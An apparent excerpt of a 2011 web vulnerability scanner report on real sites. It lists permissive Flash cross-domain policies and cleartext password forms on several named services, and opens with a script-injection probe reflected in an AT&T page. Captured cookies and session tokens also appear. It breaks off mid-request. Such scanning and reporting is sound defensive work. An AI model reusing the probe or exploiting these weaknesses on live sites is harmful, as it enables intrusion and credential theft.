bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Ffree-packages.jsp%22%2C%22r%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22t%22%3A1313432484011%2C%22u%22%3A%226923670900791695274%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fpackages%2Fwindows-packages.jsp%22%2C%22l%22%3A%22Windows%C2%AE%20Packages%22%2C%22de%22%3A%7B%22su%22%3A%22Find%20great%20free%20Phone%20deals%20and%20packages%20at%20AT%26T%20that%20can%20help%20save%20you%20money%20at%20AT%26T.%20Wireless%20from%20AT%26T.%20Wireless%20from%20AT%26T.%22%2C%22ti%22%3A%22Free%20Phone%20Deals%20and%20Packages%20-%20Shop%20-%20Wireless%20from%20AT%26T%22%2C%22nw%22%3A1812%2C%22nl%22%3A185%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 103725
Expires: Mon, 15 Aug 2011 18:21:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:21:20 GMT
Connection: close
Set-Cookie: TLTHID=5F5A1B66C76B10C7A276A9FCD465FFF0; Path=/; Domain=.att.com
Set-Cookie: B2CSESSIONID=rsYZTJjfL3y0VV!1152165740; path=/; HttpOnly
Set-Cookie: DYN_USER_ID=4148392065; path=/
Set-Cookie: DYN_USER_CONFIRM=844c64bbbcdbe9b5aae43a780d8f9ae8; path=/


                                                                       
...[SNIP]...
<script type="text/javascript" charset="utf-8">
   function SessionVars() {
       this.getCurrSessId = function() {
           var pSessionId = '1fKdTJjTTvqPt1!1142544054a8415</script><a>c26c8c4bf0d';
           return pSessionId;
       };

       this.getCurrBrowserId = function() {
           var pBrowserId;
           pBrowserId = this.getCookie('browserid');
           return pBrowserId;
       };
       
       this.getCookie = function(name) {
   
...[SNIP]...

2. Flash cross-domain policy  previous  next
There are 6 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


2.1. http://at-img2.tdimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at-img2.tdimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at-img2.tdimg.com

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:33 GMT
Content-Type: text/xml
Content-Length: 148
Last-Modified: Mon, 28 Sep 2009 06:30:00 GMT
Connection: close
Expires: Tue, 14 Aug 2012 18:56:33 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.tudou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.2. http://at-img3.tdimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at-img3.tdimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: at-img3.tdimg.com
Proxy-Connection: keep-alive
Referer: http://js.tudouui.com/bin/channels/IndexAdPanelAct_26.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:26 GMT
Content-Type: text/xml
Content-Length: 152
Last-Modified: Fri, 14 Aug 2009 08:46:15 GMT
Connection: keep-alive
Expires: Tue, 14 Aug 2012 18:56:26 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.toodou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.3. http://at-img4.tdimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://at-img4.tdimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: at-img4.tdimg.com
Proxy-Connection: keep-alive
Referer: http://js.tudouui.com/bin/channels/IndexAdPanelAct_26.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws/0.1
Date: Mon, 15 Aug 2011 18:56:20 GMT
Content-Type: text/xml
Content-Length: 148
Last-Modified: Mon, 28 Sep 2009 06:30:00 GMT
Connection: keep-alive
Expires: Tue, 14 Aug 2012 18:56:20 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

<?xml version="1.0"?>
<!-- http://www.tudou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.4. http://stat.tudou.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stat.tudou.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stat.tudou.com

Response

HTTP/1.1 200 OK
ETag: W/"152-1275381096000"
Age: 1
Content-Length: 152
Date: Mon, 15 Aug 2011 17:34:10 GMT
X-Cache: HIT from stat.tudou.com
Last-Modified: Tue, 01 Jun 2010 08:31:36 GMT
Server: Apache
Content-Type: application/xml
Connection: Keep-Alive

<?xml version="1.0"?>
<!-- http://www.toodou.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

2.5. http://www.xhamstercams.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xhamstercams.com

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:49 GMT
Server: Apache
Last-Modified: Wed, 03 Mar 2010 19:12:09 GMT
Accept-Ranges: bytes
Content-Length: 218
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.naiadsystems.com" />
</cros
...[SNIP]...

2.6. http://xhamster.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://xhamster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: xhamster.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 18:56:31 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 23 Jun 2010 11:17:08 GMT
ETag: "11a0e3b-75-489b0adaeb500"
Accept-Ranges: bytes
Content-Length: 117

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.xhamster.com" />
</cross-domain-policy>

3. Cleartext submission of password  previous  next
There are 14 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://js.mail.sohu.com/passport/pi18030.201011300952.js  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.mail.sohu.com
Path:   /passport/pi18030.201011300952.js

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /passport/pi18030.201011300952.js HTTP/1.1
Host: js.mail.sohu.com
Proxy-Connection: keep-alive
Referer: http://www.sohu.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Connection: keep-alive
Server: nginx/0.7.65
Date: Sun, 24 Jul 2011 08:59:30 GMT
Last-Modified: Tue, 30 Nov 2010 01:52:14 GMT
Expires: Sat, 22 Oct 2011 08:59:30 GMT
Cache-Control: max-age=7776000
FSS-Cache: HIT from 3805485.5968183.4789070
Content-Length: 14086

function changebg(A){if(A==1){getObject("pCardOpen").className="open hidden";getObject("pCardClose").className="close";PassportSC.cElement.className="passportc";PassportSC.cElement.style.display="bloc
...[SNIP]...
;TopUtils.Deletecookie("SOHUID")};PassportSC.showMsg=function(msg){var e=document.getElementById("loginMsg");if(e!=null){e.innerHTML=msg}};PassportSC._drawLoginForm=function(){this.cElement.innerHTML='<form method="post" onsubmit="return PassportSC.doLogin();" name="loginform"><div class="passportc_title">
...[SNIP]...
<li>..&nbsp;&nbsp;.. <input name="password" type="password" class="ppinput" autocomplete="off" disableautocomplete /></li>
...[SNIP]...

3.2. http://www.ask.com/settings  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ask.com
Path:   /settings

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /settings HTTP/1.1
Host: www.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=084EE34C926D4254193520127E77B26A; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjAwLVVUQw%3D%3D&po=0&pp=dir; qc=0; __qca=P0-1861158471-1313432937925

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNwpcQDgAACSmEQcAAADE
from-tr: trafrt008iad.io.askjeeves.info
Cache-Control: no-cache
Content-Length: 65232
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:07 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA3LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:07 GMT; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">


<html>


<head>
   


...[SNIP]...
</div>
<form name="myForm2" id="myForm2">
<div id="passsuccessmsg">
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="currentpassword" id="currentpassword" value=""></div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="newpassword" id="newpassword" value=""> </div>
...[SNIP]...
<div ><input style="margin-top:6px;" class="passwd pgcset" type="password" size="35" name="password" id="password" value=""> </div>
...[SNIP]...

3.3. http://www.mediafire.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/tw_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="mf2_password" id="mf2_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link" target="_top">
...[SNIP]...

3.4. http://www.mediafire.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" id="link_mf_acct_form" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="mf2_password" id="mf2_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link" target="_top">
...[SNIP]...

3.5. http://www.mediafire.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form name="form_login1" id="form_login1" method="post" action="/dynamic/login.php" target="userwork" class="form"> <fieldset>
...[SNIP]...
</label> <input type="password" name="login_pass" id="login_pass" class="login_box" autocomplete="off" onclick="document.getElementById('login_penalty_message').style.display='none';"/> <a href="/lost_password.php">
...[SNIP]...

3.6. http://www.mediafire.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" id="use_fb_email_form" onsubmit="wP(2);return true;"> <label>Password:</label> <input type="password" name="use_fb_email_pass" id="use_fb_email_pass" class="login_box"> <label>
...[SNIP]...
</label> <input type="password" name="use_fb_email_pass2" id="use_fb_email_pass2" class="login_box"> <div>
...[SNIP]...

3.7. http://www.mediafire.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/tw_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <label>
...[SNIP]...
</label> <input type="password" name="use_tw_email_pass" id="use_tw_email_pass" class="login_box"> <label>
...[SNIP]...
</label> <input type="password" name="use_tw_email_pass2" id="use_tw_email_pass2" class="login_box"> <div>
...[SNIP]...

3.8. http://www.mediafire.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediafire.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.mediafire.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:01:59 GMT
Cache-control: private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Content-Length: 28867
Connection: close
Content-Type: text/html; charset=UTF-8
Server: MediaFire

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/19
...[SNIP]...
</p> <form action="/dynamic/fb_login.php" target="userwork" method="POST" onsubmit="wP(2);return true;"> <p class="soc_display_email" id="fb_step3_email">
...[SNIP]...
</label> <input type="password" name="mf_password" id="mf_password" class="login_box"> <a href="/lost_password.php" class="soc_pwd_link">
...[SNIP]...

3.9. http://www.tudou.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tudou.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tudou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: tws0.3
Date: Mon, 15 Aug 2011 18:55:46 GMT
Content-Type: text/html
Connection: close
Last-Modified: Mon, 15 Aug 2011 18:53:30 GMT
Content-Length: 247630
Expires: Mon, 15 Aug 2011 19:02:36 GMT
Cache-Control: max-age=420
Vary: Accept-Encoding
Age: 10
X-Cache: HIT from www.tudou.com

<!DOCTYPE html>
<html>
<head>
<meta charset="gbk"/>

<title>......_...................._............,............,............</title>
<meta name="Keywords" content="......,....,....,........,...
...[SNIP]...
<div class="c">
                   <form method="post" action="http://login.tudou.com/login.do?act=login&amp;service=http://www.tudou.com/">
                       <p>
...[SNIP]...
<span class="lg_i"><input type="password" id="pwd" name="password" class="text" tabindex="2"></span>
...[SNIP]...

3.10. http://www.xhamstercams.com/cam/Juicy_Jules19/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xhamstercams.com
Path:   /cam/Juicy_Jules19/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /cam/Juicy_Jules19/?gl=1&AFNO=1-0-624213-344279&UHNSMTY=458&lp=3 HTTP/1.1
Host: www.xhamstercams.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NaiadJP=cj1odHRwJTNBJTJGJTJGeGhhbXN0ZXIuY29tJTJGJmU9aHR0cCUzQSUyRiUyRnd3dy54aGFtc3RlcmNhbXMuY29tJTJGZXhwb3J0cyUyRmdvbGl2ZSUyRiUzRkFGTk8lM0QxLTAtNjI0MjEzLTM0NDI3OSUyNlVITlNNVFklM0Q0NTglMjZERiUzRDAlMjZscCUzRDMmbz0xMzEzNDM0NTg2

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:56:48 GMT
Server: Apache
Set-Cookie: fcact=fcA6_2502%2F2Z; expires=Mon, 22-Aug-2011 18:56:48 GMT; path=/
P3P: policyref="http://www.streamate.com/p3p/ns.xml", CP="NOI DSP COR CUR ADMa DEVa OUR IND UNI STA"
Vary: Accept-Encoding
Content-Length: 32305
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free live video chat, free nude cam, sex shows, adult streaming, free porn - XHamsterCam
...[SNIP]...
</p>
<form action="http://www.xhamstercams.com/login.php?AFNO=1-0-624213-344279&UHNSMTY=458" method="post" accept-charset="utf-8" name="loginform" id="loginform">
<input type="hidden" name="AFNO" value="1-0-624213-344279">
...[SNIP]...
</label>
<input type="password" size="8" name="sapwd">
<input type="submit" name="login" border="1" id="goBt" value="Go">
...[SNIP]...

3.11. http://xhamster.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:04:10 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m5
Set-Cookie: adNum=387; path=/
Vary: Accept-Encoding
Content-Length: 59237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>xHamster's Free Porn Videos</title>
<meta name="description" content="xH
...[SNIP]...
</div>
<form id='loginForm'>
<table cellpadding="0" cellspacing="0" style="display: table;">
...[SNIP]...
<td><input type='password' class='inp' name="password" id='password'></td>
...[SNIP]...

3.12. http://xhamster.com/login.php  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /login.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login.php HTTP/1.1
Host: xhamster.com
Proxy-Connection: keep-alive
Referer: http://xhamster.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
